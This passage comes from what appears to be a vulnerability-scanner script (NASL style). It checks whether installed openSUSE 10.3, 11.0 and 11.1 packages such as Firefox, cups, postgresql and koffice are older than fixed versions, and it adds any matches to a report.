isrpmvuln(pkg:\"libgthread-2_0-0\", rpm:\"libgthread-2_0-0~2.18.2~5.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkcal\", rpm:\"libkcal~3.5.10~8.14.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkcal-devel\", rpm:\"libkcal-devel~3.5.10~8.14.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkcal2\", rpm:\"libkcal2~3.5.10~8.14.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkde4\", rpm:\"libkde4~4.1.3~4.10.4\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkde4-devel\", rpm:\"libkde4-devel~4.1.3~4.10.4\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkdecore4\", rpm:\"libkdecore4~4.1.3~4.10.4\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkdecore4-devel\", rpm:\"libkdecore4-devel~4.1.3~4.10.4\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkdepim4\", rpm:\"libkdepim4~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkdepim4-devel\", rpm:\"libkdepim4-devel~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkdepimlibs4\", rpm:\"libkdepimlibs4~4.1.3~5.2.6\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkdepimlibs4-devel\", rpm:\"libkdepimlibs4-devel~4.1.3~5.2.6\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkmime-devel\", rpm:\"libkmime-devel~3.5.10~8.14.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkmime2\", rpm:\"libkmime2~3.5.10~8.14.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkonq-devel\", rpm:\"libkonq-devel~4.1.3~3.8.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkonq5\", rpm:\"libkonq5~4.1.3~3.8.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libktnef-devel\", rpm:\"libktnef-devel~3.5.10~8.14.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libktnef1\", rpm:\"libktnef1~3.5.10~8.14.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpcap-devel\", rpm:\"libpcap-devel~0.9.8~50.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpcap0\", rpm:\"libpcap0~0.9.8~50.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libudev-devel\", rpm:\"libudev-devel~128~9.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libudev0\", rpm:\"libudev0~128~9.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id\", rpm:\"libvolume_id~126~17.38.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id-devel\", rpm:\"libvolume_id-devel~128~9.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id1\", rpm:\"libvolume_id1~128~9.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxine-devel\", rpm:\"libxine-devel~1.1.15~23.3.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxine1\", rpm:\"libxine1~1.1.15~23.3.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxine1-gnome-vfs\", rpm:\"libxine1-gnome-vfs~1.1.15~23.3.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxine1-pulse\", rpm:\"libxine1-pulse~1.1.15~23.3.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"module-init-tools\", rpm:\"module-init-tools~3.4~56.10.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mozilla-xulrunner190\", rpm:\"mozilla-xulrunner190~1.9.0.8~1.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mozilla-xulrunner190-devel\", rpm:\"mozilla-xulrunner190-devel~1.9.0.8~1.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mozilla-xulrunner190-gnomevfs\", rpm:\"mozilla-xulrunner190-gnomevfs~1.9.0.8~1.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mozilla-xulrunner190-translations\", rpm:\"mozilla-xulrunner190-translations~1.9.0.8~1.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openswan\", rpm:\"openswan~2.6.16~1.47.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openswan-doc\", rpm:\"openswan-doc~2.6.16~1.47.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"phonon-backend-xine\", rpm:\"phonon-backend-xine~4.1.3~4.2.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql\", rpm:\"postgresql~8.3.7~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-contrib\", rpm:\"postgresql-contrib~8.3.7~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-devel\", rpm:\"postgresql-devel~8.3.7~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-docs\", rpm:\"postgresql-docs~8.3.7~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-libs\", rpm:\"postgresql-libs~8.3.7~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-server\", rpm:\"postgresql-server~8.3.7~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python-xpcom190\", rpm:\"python-xpcom190~1.9.0.8~1.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"strongswan\", rpm:\"strongswan~4.2.8~1.24.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"strongswan-doc\", rpm:\"strongswan-doc~4.2.8~1.24.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"sysconfig\", rpm:\"sysconfig~0.71.11~7.4.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~128~9.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xpdf\", rpm:\"xpdf~3.02~97.78.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xpdf-tools\", rpm:\"xpdf-tools~3.02~97.78.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"MozillaFirefox\", rpm:\"MozillaFirefox~3.0.8~1.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"MozillaFirefox-translations\", rpm:\"MozillaFirefox-translations~3.0.8~1.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bluez-audio\", rpm:\"bluez-audio~3.32~8.7\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bluez-cups\", rpm:\"bluez-cups~3.32~8.7\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bluez-test\", rpm:\"bluez-test~3.32~8.7\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bluez-utils\", rpm:\"bluez-utils~3.32~8.7\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"clamav\", rpm:\"clamav~0.95.1~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"clamav-db\", rpm:\"clamav-db~0.95.1~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.3.7~25.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"cups-client\", rpm:\"cups-client~1.3.7~25.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.3.7~25.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.3.7~25.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glib2\", rpm:\"glib2~2.16.3~20.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glib2-branding-upstream\", rpm:\"glib2-branding-upstream~2.16.3~20.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glib2-devel\", rpm:\"glib2-devel~2.16.3~20.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glib2-doc\", rpm:\"glib2-doc~2.16.3~20.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glib2-lang\", rpm:\"glib2-lang~2.16.3~20.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnutls\", rpm:\"gnutls~2.2.2~17.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gpg2\", rpm:\"gpg2~2.0.9~22.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gpg2-lang\", rpm:\"gpg2-lang~2.0.9~22.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"hal\", rpm:\"hal~0.5.11~8.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"hal-devel\", rpm:\"hal-devel~0.5.11~8.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3\", rpm:\"kdepim3~3.5.9~53.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3-devel\", rpm:\"kdepim3-devel~3.5.9~53.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3-kpilot\", rpm:\"kdepim3-kpilot~3.5.9~53.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3-mobile\", rpm:\"kdepim3-mobile~3.5.9~53.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3-notes\", rpm:\"kdepim3-notes~3.5.9~53.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3-time-management\", rpm:\"kdepim3-time-management~3.5.9~53.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kitchensync\", rpm:\"kitchensync~3.5.9~53.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"klamav\", rpm:\"klamav~0.46~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice\", rpm:\"koffice~1.6.3~157.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-database\", rpm:\"koffice-database~1.6.3~157.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-database-mysql\", rpm:\"koffice-database-mysql~1.6.3~157.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-database-psql\", rpm:\"koffice-database-psql~1.6.3~157.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-devel\", rpm:\"koffice-devel~1.6.3~157.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-extra\", rpm:\"koffice-extra~1.6.3~157.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-illustration\", rpm:\"koffice-illustration~1.6.3~157.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-planning\", rpm:\"koffice-planning~1.6.3~157.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-presentation\", rpm:\"koffice-presentation~1.6.3~157.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-python\", rpm:\"koffice-python~1.6.3~157.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-ruby\", rpm:\"koffice-ruby~1.6.3~157.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-spreadsheet\", rpm:\"koffice-spreadsheet~1.6.3~157.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-wordprocessing\", rpm:\"koffice-wordprocessing~1.6.3~157.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5\", rpm:\"krb5~1.6.3~50.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5-apps-clients\", rpm:\"krb5-apps-clients~1.6.3~50.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5-apps-servers\", rpm:\"krb5-apps-servers~1.6.3~50.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5-client\", rpm:\"krb5-client~1.6.3~50.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5-devel\", rpm:\"krb5-devel~1.6.3~50.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5-server\", rpm:\"krb5-server~1.6.3~50.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgio-2_0-0\", rpm:\"libgio-2_0-0~2.16.3~20.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgio-fam\", rpm:\"libgio-fam~2.16.3~20.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libglib-2_0-0\", rpm:\"libglib-2_0-0~2.16.3~20.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgmodule-2_0-0\", rpm:\"libgmodule-2_0-0~2.16.3~20.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls-devel\", rpm:\"libgnutls-devel~2.2.2~17.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls-extra-devel\", rpm:\"libgnutls-extra-devel~2.2.2~17.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls-extra26\", rpm:\"libgnutls-extra26~2.2.2~17.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls26\", rpm:\"libgnutls26~2.2.2~17.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgobject-2_0-0\", rpm:\"libgobject-2_0-0~2.16.3~20.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgthread-2_0-0\", rpm:\"libgthread-2_0-0~2.16.3~20.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkcal\", rpm:\"libkcal~3.5.9~53.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkcal-devel\", rpm:\"libkcal-devel~3.5.9~53.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkcal2\", rpm:\"libkcal2~3.5.9~53.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkmime-devel\", rpm:\"libkmime-devel~3.5.9~53.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkmime2\", rpm:\"libkmime2~3.5.9~53.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libktnef-devel\", rpm:\"libktnef-devel~3.5.9~53.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libktnef1\", rpm:\"libktnef1~3.5.9~53.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id\", rpm:\"libvolume_id~120~13.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id-devel\", rpm:\"libvolume_id-devel~120~13.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mozilla-xulrunner190\", rpm:\"mozilla-xulrunner190~1.9.0.8~1.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mozilla-xulrunner190-devel\", rpm:\"mozilla-xulrunner190-devel~1.9.0.8~1.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mozilla-xulrunner190-gnomevfs\", rpm:\"mozilla-xulrunner190-gnomevfs~1.9.0.8~1.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mozilla-xulrunner190-translations\", rpm:\"mozilla-xulrunner190-translations~1.9.0.8~1.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openswan\", rpm:\"openswan~2.4.7~130.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openswan-doc\", rpm:\"openswan-doc~2.4.7~130.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql\", rpm:\"postgresql~8.3.7~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-contrib\", rpm:\"postgresql-contrib~8.3.7~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-devel\", rpm:\"postgresql-devel~8.3.7~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-docs\", rpm:\"postgresql-docs~8.3.7~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-libs\", rpm:\"postgresql-libs~8.3.7~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-server\", rpm:\"postgresql-server~8.3.7~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"strongswan\", rpm:\"strongswan~4.2.1~11.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"strongswan-doc\", rpm:\"strongswan-doc~4.2.1~11.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"sysconfig\", rpm:\"sysconfig~0.70.8~3.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"timezone\", rpm:\"timezone~2009d~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~120~13.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xine-devel\", rpm:\"xine-devel~1.1.12~8.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xine-extra\", rpm:\"xine-extra~1.1.12~8.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xine-lib\", rpm:\"xine-lib~1.1.12~8.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xpdf\", rpm:\"xpdf~3.02~95.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xpdf-tools\", rpm:\"xpdf-tools~3.02~95.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"zypper\", rpm:\"zypper~0.11.11~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"MozillaFirefox\", rpm:\"MozillaFirefox~2.0.0.21post~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"MozillaFirefox-translations\", rpm:\"MozillaFirefox-translations~2.0.0.21post~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bluez-cups\", rpm:\"bluez-cups~3.18~13.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bluez-test\", rpm:\"bluez-test~3.18~13.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bluez-utils\", rpm:\"bluez-utils~3.18~13.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"clamav\", rpm:\"clamav~0.95.1~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"clamav-db\", rpm:\"clamav-db~0.95.1~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.2.12~22.21\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"cups-client\", rpm:\"cups-client~1.2.12~22.21\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.2.12~22.21\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.2.12~22.21\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glib2\", rpm:\"glib2~2.14.1~4.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glib2-devel\", rpm:\"glib2-devel~2.14.1~4.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glib2-doc\", rpm:\"glib2-doc~2.14.1~4.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glib2-lang\", rpm:\"glib2-lang~2.14.1~4.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnutls\", rpm:\"gnutls~1.6.1~36.6\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnutls-devel\", rpm:\"gnutls-devel~1.6.1~36.6\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gpg2\", rpm:\"gpg2~2.0.4~49.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3\", rpm:\"kdepim3~3.5.7.enterprise.0.20070904.708012~9.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3-devel\", rpm:\"kdepim3-devel~3.5.7.enterprise.0.20070904.708012~9.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3-kpilot\", rpm:\"kdepim3-kpilot~3.5.7.enterprise.0.20070904.708012~9.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3-mobile\", rpm:\"kdepim3-mobile~3.5.7.enterprise.0.20070904.708012~9.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3-notes\", rpm:\"kdepim3-notes~3.5.7.enterprise.0.20070904.708012~9.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3-time-management\", rpm:\"kdepim3-time-management~3.5.7.enterprise.0.20070904.708012~9.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kitchensync\", rpm:\"kitchensync~3.5.7.enterprise.0.20070904.708012~9.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"klamav\", rpm:\"klamav~0.46~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice\", rpm:\"koffice~1.6.3~51.5\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-database\", rpm:\"koffice-database~1.6.3~51.5\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-database-mysql\", rpm:\"koffice-database-mysql~1.6.3~51.5\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-database-psql\", rpm:\"koffice-database-psql~1.6.3~51.5\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-devel\", rpm:\"koffice-devel~1.6.3~51.5\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-extra\", rpm:\"koffice-extra~1.6.3~51.5\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-illustration\", rpm:\"koffice-illustration~1.6.3~51.5\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = 